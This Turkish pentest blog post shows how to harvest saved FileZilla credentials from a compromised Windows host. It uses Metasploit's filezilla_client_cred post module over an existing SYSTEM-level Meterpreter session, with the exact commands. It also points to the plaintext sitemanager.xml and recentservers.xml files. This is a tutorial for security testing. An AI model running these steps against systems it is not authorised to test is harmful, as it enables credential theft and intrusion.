Meterpreter Bağlantısı Elde Edilmiş Olan Windows Bilgisayarda MSF filezilla_client_cred Post Modülü ile Filezilla Uygulamasındaki Erişim Bilgilerinin Elde Edilmesi

0
174
views
Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarda kritik bilgi elde edilmeye çalışılır. Bu yazıda Meterpreter erişimi elde edilmiş bir Windows istemcinin Filezilla uygulamasında kayıtlı olan erişim bilgileri MSF filezilla_client_cred post modülü ile elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

W7 adlı bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF filezilla_client_cred post modülü ile Filezilla uygulamasının içerisinde kayıtlı olan erişim bilgilerinin elde edilmesi için modül seçilir ve seçenekleri incelenir.

sessions
search filezilla type:post
use post/multi/gather/filezilla_client_cred
show options

acquiring-sensitive-logon-informations-on-filezilla-client-by-using-msf-filezilla-client-cred-post-module-01

Modüle oturum ID değeri verilerek modül çalışıtırılır ve Filezilla uygulamasında kayıtlı olan kimlik bilgileri ele geçirilir.

set SESSION 1
show options
run

acquiring-sensitive-logon-informations-on-filezilla-client-by-using-msf-filezilla-client-cred-post-module-02

İpucu: Her bir kullanıcının “C:\Users\<KullaniciAdi>\Appdata\Roaming\Filezilla” dizini altındaki “sitemanager.xml” (ve “recentservers.xml”) dosyaları içerisinde erişim bilgileri açık halde bulunur. Bu dosyalar herhangi bir metin editörü ile açılarak da Filezilla uygulamasındaki erişim bilgileri elde edilebilir.

acquiring-sensitive-logon-informations-on-filezilla-client-by-using-msf-filezilla-client-cred-post-module-03

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

This site uses Akismet to reduce spam. Learn how your comment data is processed.